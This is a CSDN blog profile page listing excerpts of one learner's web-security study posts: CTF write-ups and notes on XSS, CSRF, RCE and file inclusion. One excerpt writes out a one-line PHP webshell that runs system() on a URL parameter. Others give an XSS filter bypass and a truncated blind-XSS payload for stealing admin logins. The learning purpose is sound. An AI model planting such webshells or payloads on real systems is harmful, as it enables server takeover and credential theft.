老-男孩
码龄6年
关注
提问 私信
  • 博客:148,825
    社区:1
    148,826
    总访问量
  • 35
    原创
  • 1,374,891
    排名
  • 44
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:广西
  • 加入CSDN时间: 2018-11-27
博客简介:

qq_43814486的博客

查看详细资料
个人成就
  • 获得95次点赞
  • 内容获得22次评论
  • 获得290次收藏
  • 代码片获得718次分享
创作历程
  • 40篇
    2019年
成就勋章
TA的专栏
  • 作业
    21篇
  • Ubuntu的安装
  • apache和php的整合
    1篇
  • 学习方法总结
  • 我的笔记
    15篇
  • 我欠下的债
    6篇
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

“百度杯”CTF比赛 2017 二月场,题目名称:爆破-3

刚刚打开就看到404:看了下网址,没毛病,于是转到index.php看看:已经很清楚了,就是要在120秒内达成这个条件10次就能输出flag了$ _SESSION['whoami']==( $ value[0]. $ value[1]) && substr(md5($value),5,4)==0真是如题目所说的,,,爆破,,,,,然后我就想如何?value=(解密的e...
原创
发布博客 2019.11.18 ·
569 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

百度杯”CTF比赛 九月场,web题,题名:123,题名内容:12341234,然后就解开了

打开后看到:查看网页源代码:根据提示去找user.php文件,首先我是直接访问:然后啥也没有,尝试下载user.php文件:下载成功,打开:再根据原来的提示,密码是用户名加生日,上bp爆破一下...
原创
发布博客 2019.11.10 ·
1193 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

常见危险函数及特殊函数(1)(几乎照抄Virink老师的笔记,,,,)

PHP代码执行函数eval($code)函数:把字符串 $code作为PHP代码执行。很多常见的webshell都是用eval执行的()包含函数命令执行函数文件操作函数特殊函数新手上路,若有错误,还望指出,虚心学习,一定改正。...
转载
发布博客 2019.07.21 ·
865 阅读 ·
0 点赞 ·
1 评论 ·
2 收藏

代码审计之常见的PHP的配置

1、配置文件PHP配置文件一般是指:php.ini文件,php.ini是全局配置文件,里边可以设置很多东西,例如:1、资源限制:max_execution_time integer这设置了脚本被解析器中止之前允许的最大执行时间,单位秒。 防止一些不好的脚本占尽服务器资源。(默认设置为30,但从命令行运行PHP时默认为0。)2、数据处理:post_max_size intager允...
原创
发布博客 2019.07.20 ·
219 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

审计方法与步骤(本篇基本上是照搬老师的笔记,没什么东西)

基础准备1、获得源码。大多数PHP程序都是开源的,找到官方下载最新的源码包就好了。2、安装网站。在本地搭建网站,一边审计一边调试。实时跟踪各种动态变化。(重要)把握大局的思想我们需要对网站有一个完整的了解,例如:网站结构,入口文件,配置文件,过滤功能。网站结构:浏览源码文件,了解该程序的大致目录。入口文件:index.php、admin.php文件一般是整个程序的入口,详细读...
原创
发布博客 2019.06.20 ·
389 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

初学文件包含漏洞

文件包含漏洞概念:概念:在web后台开发中,程序员为例提高效率以及让带吗看起来更加简洁,会使用包含函数(include()函数 和require()函数 ),例如<?php include function.php?>调用文件function.php文件例如:有些时候因为网站功能需求,会让前端的用户选择需要包含的文件(或在前端的功能中使用了包含函数),又由于开发人员没有...
原创
发布博客 2019.05.13 ·
270 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

netcat(瑞士军刀)和 mimikatz(法国大面包)的运行(作业,)

netcat(瑞士军刀)运行1.下载netcat。2.解压下载的netcat,放到目录中:E:
etcat(任何一个目录都行,等会设置环境变量的时候对应就可以了)3.在环境变量path中添加上面的目录。4.打开cmd命令行,输入netcai的指令就可以了。mimikatz(法国大面包 )运行下载完mimikatz之后,放到硬盘中会有安全软件的提醒,360就加入白名单,windows...
原创
发布博客 2019.05.12 ·
265 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

初学RCE(远程命令/代码执行漏洞)

RCE英文全称:remote command/code execute漏洞出现的原因:我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。,这就是RCE漏洞...
原创
发布博客 2019.05.09 ·
54481 阅读 ·
63 点赞 ·
4 评论 ·
149 收藏

CSRF漏洞(初步理解)

概念Cross-site request forgery简称“CSRF”(跨站请求伪造)也被称为one-click attack 或者 session riding。攻击思路以淘宝为例,目的修改密码。打开自己的淘宝,进入修改密码的页面,填写完信息后发送请求,然后把这个URL用抓包的方式获取下来,然后发送给对方。成功的条件:1.对方已经打开淘宝。2.对方点击你的连接。只要点击了这个...
原创
发布博客 2019.05.09 ·
689 阅读 ·
2 点赞 ·
0 评论 ·
2 收藏

xss漏洞分析

xss名字来源:xss又叫跨站脚本攻击,英文(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)混淆,所以将跨站脚本攻击命名为XSS。其实xss叫”跨站脚本攻击“ 这个名字很随意,仅仅是因为最开始时黑客们演示xss漏洞的时候用的是“跨站”的植入脚本这种方式,所以才叫这个名,现在浏览器都默认执行“同源策略”,xss漏洞很难再去...
原创
发布博客 2019.05.08 ·
554 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

XSS(href输出,js输出)防范措施

防御总的原则:根据实际情况对输入做过滤,对输出做转义href输出漏洞:输出出现在a标签的href属性里面,可以使用javascript协议来执行js后端:$message=htmlspecialchars($_GET['message'],ENT_QUOTES);$html.="<a href='{$message}'>可以看到,虽然对htmlspecialchars()...
原创
发布博客 2019.05.05 ·
9422 阅读 ·
3 点赞 ·
0 评论 ·
4 收藏

xss绕过方法(前端绕过,拼凑绕过,注释干扰绕过,编码绕过)

绕过思路前端绕过:前端有很多种方法绕过,比如抓包重放或者修改前端代码。大小写绕过:一般后台对输入写进行过滤使用两种方法:1,使用正则匹配,2,用查找的函数查找。这两种方法可以用大小写混合的方式进行绕过,而后端是不管大小写的,可以正常执行我们的语句。拼凑:后端会对我们输入的标签进行替换,但只替换一次,所以可以这样:<scri<script>pt>alert("hell...
原创
发布博客 2019.05.05 ·
8749 阅读 ·
3 点赞 ·
0 评论 ·
20 收藏

xss盲打(通过xss盲打盗取管理员账号和密码!)

原理:其实和一般的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞!上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下:1,我输入的payload:<script>documen...
原创
发布博客 2019.05.03 ·
6722 阅读 ·
7 点赞 ·
8 评论 ·
32 收藏

xss漏洞测试(cookie的窃取和利用,钓鱼,键盘记录)

cookie的窃取和利用
原创
发布博客 2019.05.03 ·
4079 阅读 ·
5 点赞 ·
3 评论 ·
22 收藏

cookie和session

session:session在网络应用中称为 会话控制。session对象存储特定用户会话所需要的属性以及配置信息,作用是当用户在web页面之间进行跳转是,存储在session对象中的变量将不会丢失,而是一直存在,直到退出(浏览器)。 session又翻译为时域,是指一个终端用户与交互系统进行通信的时间间隔,通常指从注册进入系统到注销退出系统之间所经过的时间。我对cookie的理解:用户...
转载
发布博客 2019.04.29 ·
175 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

一句话木马

条件:1.有服务器的写入权限。2.知道服务器的地址。目的:将我们的一句话木马插入到服务器的asp文件中。例如:在服务器的地址里创建一个叫virus.php文件里边放代码:<?php system($_GET['cmd'])?>然后我们就可以通过URL去操控服务器的cmd了,例如访问:http://127.0.0.1/virus.php?cmd=ipconfig相当于在服...
原创
发布博客 2019.04.22 ·
2413 阅读 ·
0 点赞 ·
2 评论 ·
1 收藏

DOM型的xss漏洞利用

DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!)原理:上图var str = docume...
原创
发布博客 2019.04.22 ·
16284 阅读 ·
2 点赞 ·
0 评论 ·
22 收藏

http协议

通过发送请求获取服务器资源的web浏览器等,都可以叫做客户端(client)http是:hyper text transfer protocol(超文本传输协议)web使用http协议作为规范,完成从客服端到服务器端等一系列运作流程。可以说,web是建立在http协议上通信的。tcp/ip协议计算机与网络设备要相互通信,双方就必须基于相同的的方法,比如,如何探测到通信目标,由哪一边先发起通...
原创
发布博客 2019.04.15 ·
137 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

http方法下,get请求和post请求的区别(面试向)

GET产生的URL地址可以被Bookmark,而POST不可以。GET请求只能进行url编码,而POST支持多种编码方式。GET请求参数会被完整保留在浏览器历史记录里,而POST中的参数不会被保留。GET请求在URL中传送的参数是有长度限制的,而POST没有。对参数的数据类型,GET只接受ASCII字符,而POST没有限制。GET比POST更不安全,因为参数直接暴露在URL上,所以不能用...
原创
发布博客 2019.04.15 ·
355 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

get方式的xss漏洞利用

原理:后端没有对信息的输入和输出进行处理。提交信息(精心构造的payload)后,页面实质是把信息通过URL传到后台,也就是说,每一次通过浏览器进行这个URL访问的时候都会执行我们刚刚提交的信息(精心构造的payload)大致过程如图:插一个小知识:通过前端对输入框进行限制其实是没用的,可以通过查看前端的代码找到对应的代码进行修改,如图:...
原创
发布博客 2019.04.15 ·
2739 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏
加载更多